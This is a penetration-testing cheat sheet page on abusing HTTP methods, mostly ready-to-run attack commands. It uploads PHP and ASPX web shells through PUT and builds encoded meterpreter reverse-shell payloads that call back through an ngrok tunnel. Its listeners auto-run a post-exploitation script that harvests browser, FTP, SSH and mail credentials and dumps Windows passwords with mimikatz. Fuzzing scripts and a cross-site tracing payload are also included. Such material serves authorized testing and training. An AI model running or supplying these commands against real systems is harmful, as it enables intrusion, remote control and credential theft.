Penetration Testing
  • Web
    • Reconnaissance
      • Search Engine Discovery
      • Fingerprint Web Server
      • Review Webserver Metafiles
      • Enumerate Applications
      • Review Webpage Content
      • Identify Application Entry Points
      • Map Execution Paths
      • Fingerprint Web Application Framework
      • Map Application Architecture
    • Open Source Intelligence
      • Infrastructure
      • People Investigation
    • Misconfiguration
      • Network Configuration
      • App Platform Configuration
      • File Extensions Handling
      • Review Old Backup
      • Enumerate Admin Interfaces
      • HTTP Methods
      • HTTP Strict Transport Security
      • RIA Cross Domain Policy
      • File Permission
      • Subdomain Takeover
      • Cloud Storage
      • Content Security Policy
      • Path Confusion
    • Identity Management
      • Role Definitions
      • User Registration
      • Account Provisioning
      • Account Enumeration
      • Weak Username Policy
    • Broken Authentication
      • Credentials Encrypted Channel
      • Default Credentials
      • Weak Lock Out Mechanism
      • Bypassing Authentication Schema
      • Vulnerable Remember Password
      • Browser Cache Weaknesses
      • Weak Password Policy
      • Weak Security Question Answer
      • Weak Password Reset Functionalities
      • Weaker Authentication in Alternative Channel
      • Multi-Factor Authentication
    • Broken Authorization
      • Directory Traversal File Include
      • Bypassing Authorization Schema
      • Privilege Escalation
      • Insecure Direct Object References
      • OAuth Weaknesses
    • Session Management
      • Session Management Schema
      • Cookies Attributes
      • Session Fixation
      • Exposed Session Variables
      • Cross Site Request Forgery
      • Logout Functionality
      • Session Timeout
      • Session Puzzling
      • Session Hijacking
      • JSON Web Tokens
    • Input Validation
      • Reflected Cross Site Scripting
      • Stored Cross Site Scripting
      • HTTP Verb Tampering
      • HTTP Parameter Pollution
      • SQL Injection
      • LDAP Injection
      • XML Injection
      • SSI Injection
      • XPath Injection
      • IMAP SMTP Injection
      • Code Injection
      • Command Injection
      • Insecure Deserialization
      • Format String Injection
      • Incubated Vulnerability
      • HTTP Splitting Smuggling
      • HTTP Incoming Requests
      • Host Header Injection
      • Server Side Template Injection
      • Server Side Request Forgery
      • Mass Assignment
      • Regular Expression DoS
      • PHP Type Juggling
    • Error Handling
      • Improper Error Handling
      • Stack Traces
    • Weak Cryptography
      • Weak Transport Layer Security
      • Padding Oracle Attack
      • Information Unencrypted Channel
      • Weak Encryption
    • Business Logic
      • Logic Data Validation
      • Ability to Forge Requests
      • Integrity Checks
      • Process Timing
      • Race Conditions
      • Circumvention of Work Flows
      • Defenses Against Application Misuse
      • Upload of Unexpected File Types
      • Upload of Malicious Files
      • Payment Functionality
    • Client Side
      • DOM-Based Cross Site Scripting
      • JavaScript Execution
      • HTML Injection
      • Client Side URL Redirect
      • CSS Injection
      • Client Side Resource Manipulation
      • Cross Origin Resource Sharing
      • Client Side Template Injection
      • Cross Site Flashing
      • Clickjacking
      • WebSockets
      • Web Messaging
      • Browser Storage
      • Cross Site Script Inclusion
      • Reverse Tabnabbing
    • API Attacks
      • Broken Object Level Authorization
      • Broken Authentication
      • Excessive Data Exposure
      • Lack of Resources and Rate Limiting
      • Broken Function Level Authorization
      • Mass Assignment
      • Security Misconfiguration
      • Injection Attack
      • Improper Assets Management
      • Insufficient Logging and Monitoring
  • Mobile
    • Mobile App Taxonomy
    • Mobile App Security Testing
    • General
    • Android
    • iOS
  • Cloud
    • Reconnaissance
    • SaaS
    • IaaS
    • Azure
    • AWS
    • GCP
    • IBM
    • Digital Ocean
    • Kubernetes
    • CI/CD
    • Active Directory
  • Network
    • Introduction
    • Intelligence Gathering
    • Vulnerability Analysis
    • Logical Vulnerabilities
    • Exploitation of Remote Services (User-Mode)
    • Exploitation of Remote Services (Kernel-Mode)
  • Wireless
    • Page 4
  • iot
    • Page 5
Powered by GitBook
On this page
  • Check List
  • Cheat Sheet
  • Discover the Supported Methods
  • PUT Method
  • Access Control Bypass
  • Cross-Site Tracing Potential
  • HTTP Method Overriding

Was this helpful?

  1. Web
  2. Misconfiguration

HTTP Methods

PreviousEnumerate Admin InterfacesNextHTTP Strict Transport Security

Last updated 1 month ago

Was this helpful?

Check List

Cheat Sheet

Discover the Supported Methods

Check Methods

curl -X OPTIONS -I $WEBSITE

Upload phpinfo()

curl -X PUT -d "<?php phpinfo(); ?>" $WEBSITE/phpinfo.php

nmap -sS -sV --mtu 5000 --script http-methods $WEBSITE

PUT Method

Create Web Shell PHP

weevely generate 00980098 /tmp/unk9vvn.php

Create Web Shell ASPX

cp /usr/share/webshells/aspx/cmdasp.aspx /tmp/unk9vvn.aspx

Upload Web Shell PHP

curl -X PUT $WEBSITE/uploads/index.php \
     --upload-file /tmp/unk9vvn.php \
     -H "Content-Type: application/x-php"

Execute Web Shell PHP

weevely "$WEBSITE/uploads/index.php" 00980098

Upload Web Shell ASP

curl -X PUT $WEBSITE/uploads/index.aspx \
     --upload-file /tmp/unk9vvn.aspx \
     -H "Content-Type: application/x-aspx"

Execute Web Shell ASP

curl "$WEBSITE/uploads/index.aspx?cmd=whoami"

All Methods Scan

msfconsole -qx "
    use auxiliary/scanner/http/options;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    run -j"

PUT Method Scan

msfconsole -qx "
    use auxiliary/scanner/http/http_put;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    set PATH /uploads;
    run -j"

Start Ngrok

nohup ngrok tcp 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

Generate Web shell PHP

msfvenom -p php/meterpreter/reverse_tcp \
         LHOST=$NGHOST \
         PORT=$NGPORT \
         EnableStageEncoding=true \
         -f raw \
         -e php/base64 -i 3 \
         -o /tmp/unk9vvn.php
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

Generate Web Shell ASP

msfvenom -p windows/meterpreter/reverse_winhttps \
         LHOST=$NGHOST \
         PORT=$NGPORT \
         EnableStageEncoding=true \
         -f asp > /tmp/unk9vvn.aspx

Listening Metasploit PHP

msfconsole -qx "
    use multi/handler;
    set PAYLOAD php/meterpreter/reverse_tcp;
    set LHOST $NGHOST;
    set LPORT $NGPORT;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Listening Metaploit ASP

msfconsole -qx "
    use multi/handler;
    set PAYLOAD windows/meterpreter/reverse_winhttps;
    set LHOST $NGHOST;
    set LPORT $NGPORT;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Upload Shell PUT Method PHP

curl -X PUT $WEBSITE/wp-content/uploads/index.php \
--upload-file /tmp/unk9vvn.php \
-H "Content-Type: application/x-php"

Access Control Bypass

Create Script

sudo nano http-methods-fuzzer.sh
#!/bin/bash

if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <WEBSITE>"
    exit 1
fi

WEBSITE="$1"

# Validate URL format
if ! [[ "$WEBSITE" =~ ^https?:// ]]; then
    echo "Error: WEBSITE must start with http:// or https://"
    exit 1
fi

# Create temporary files
KATANA_OUTPUT=$(mktemp)
URLS_FILE=$(mktemp)
COOKIE_FILE=$(mktemp)

# Cleanup function
cleanup()
{
    rm -f "$KATANA_OUTPUT" "$URLS_FILE" "$COOKIE_FILE"
}
trap cleanup EXIT

# Run katana to gather URLs
katana -u $WEBSITE \
       -fr "(static|assets|img|images|css|fonts|icons)/" \
       -o "$KATANA_OUTPUT" \
       -xhr-extraction \
       -automatic-form-fill \
       -silent \
       -strategy breadth-first \
       -js-crawl \
       -extension-filter jpg,jpeg,png,gif,bmp,tiff,tif,webp,svg,ico,css \
       -headless --no-sandbox \
       -known-files all \
       -field url \
       -sf url

# Filter and clean extracted URLs
sed -E 's/\?.*//; s/\.aspx$//; s/\/[^/]+\.json$//' "$KATANA_OUTPUT" | grep -Ev '\.js$|&amp' | sort -u > "$URLS_FILE"

# User-Agent and headers
USER_AGENT="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
HEADERS=(
    "User-Agent: $USER_AGENT"
    "Accept: */*"
    "Accept-Language: en-US,fa-IR;q=0.5"
    "Accept-Encoding: gzip, deflate, br, zstd"
    "Connection: keep-alive"
    "Upgrade-Insecure-Requests: 1"
    "Sec-Fetch-Dest: script"
    "Sec-Fetch-Mode: no-cors"
    "Sec-Fetch-Site: cross-site"
    "DNT: 1"
    "Sec-GPC: 1"
    "Priority: u=0, i"
    "Te: trailers"
)

# Extract cookies
COOKIES=$(curl -s -I "$WEBSITE" | awk 'BEGIN {IGNORECASE=1} /^set-cookie:/ {print substr($0, 13)}' | awk -F';' '{print $1}' | tr '\n' '; ' | sed 's/; $//')

# Append cookies if available
if [[ -n "$COOKIES" ]]; then
    HEADERS+=("Cookie: $COOKIES")
fi

# Convert headers into ffuf parameters
HEADER_PARAMS=()
for HEADER in "${HEADERS[@]}"; do
    HEADER_PARAMS+=("-H" "$HEADER")
done

# Run ffuf
echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt
ffuf -w "$URLS_FILE":URL \
     -w /tmp/methods.txt:METHODS \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X METHODS \
     -r -c -mc 200 \
     "${HEADER_PARAMS[@]}"

Run Script

sudo chmod +x http-methods-fuzzer.sh;sudo ./http-methods-fuzzer.sh $WEBSITE

Cross-Site Tracing Potential

ffuf -w /tmp/urls.txt:URL \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X TRACE \
     -H "Custom-Test-Header: <scipt>alert('unk9vvn')</script>" \
     -r -c -mc 200 -mr "unk9vvn"

HTTP Method Overriding

X-HTTP-Method

echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
     -w /tmp/urls.txt:URL \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X METHODS \
     -H "X-HTTP-Method: METHODS" \
     -r -c -mc 200

X-HTTP-Method-Override

echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
     -w /tmp/urls.txt:URL \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X METHODS \
     -H "X-HTTP-Method-Override: METHODS" \
     -r -c -mc 200

X-Method-Override

echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
     -w /tmp/urls.txt:URL \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X METHODS \
     -H "X-Method-Override: METHODS" \
     -r -c -mc 200

&

cURL
Nmap
Weevely
cURL
Metasploit
Katana
FFUF
FFUF
FFUF